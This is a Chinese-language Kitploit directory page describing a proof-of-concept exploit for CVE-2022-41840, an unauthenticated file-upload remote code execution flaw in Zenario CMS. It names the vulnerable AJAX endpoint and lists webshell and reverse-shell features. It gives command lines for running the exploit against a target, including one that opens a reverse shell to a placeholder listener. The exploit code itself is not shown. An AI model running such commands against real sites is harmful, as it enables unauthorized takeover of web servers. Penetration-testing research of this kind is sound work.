Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-41840-PoC — 这是针对 CVE-2022-41840 的 PoC 漏洞利用,运行 Zenario | Kitploit
工具/GitHubGitHub/princeaikinsbaidoo/cve-2022-41840-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubprinceaikinsbaidoo/cve-2022-41840-poc

CVE-2022-41840-PoC

这是针对 CVE-2022-41840 的 PoC 漏洞利用,运行 Zenario

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
26个月前尚未审核
分享

Zenario CMS 9.3 - 未经身份验证的远程代码执行漏洞利用

CVE-2022-41840

一个影响 Zenario CMS 9.3 及更早版本的未经身份验证的远程代码执行(RCE)漏洞。该漏洞利用 AJAX 端点中的文件上传漏洞来上传 PHP 网页后门并实现代码执行。

漏洞详情

  • CVE: CVE-2022-41840
  • 受影响版本: Zenario CMS <= 9.3
  • 漏洞类型: 未认证文件上传导致远程代码执行
  • 攻击向量: HTTP POST 至 /zenario/ajax.php
  • 所需权限: 无(未认证)

使用方法

交互式网页后门

root@kitploit:~
python3 zenario_exploit.py --target http://target.com

单命令执行

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --cmd "id"

反弹 Shell

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444

要求

  • Python 3.x
  • requests 库

安装依赖:

root@kitploit:~
pip install requests

功能特性

  • 通过易受攻击的 AJAX 端点自动上传 PHP 网页后门
  • 支持多个 instanceId 值以提高成功率
  • 基于 JSON 和正则表达式的路径提取
  • 多个反弹 Shell 载荷选项(bash、python、perl、nc)
  • 支持终端的完全交互式 PTY Shell
  • 反弹 Shell 失败时的网页后门备用方案

免责声明

仅用于教育和授权安全测试目的。

本工具提供给安全研究人员和渗透测试人员,用于测试其拥有或已获明确授权的系统。未经授权访问计算机系统属违法行为,严禁使用。

维护者不承担因该工具的任何误用或损害而导致的任何责任。

许可证

本代码仅供教育目的提供。

下载工具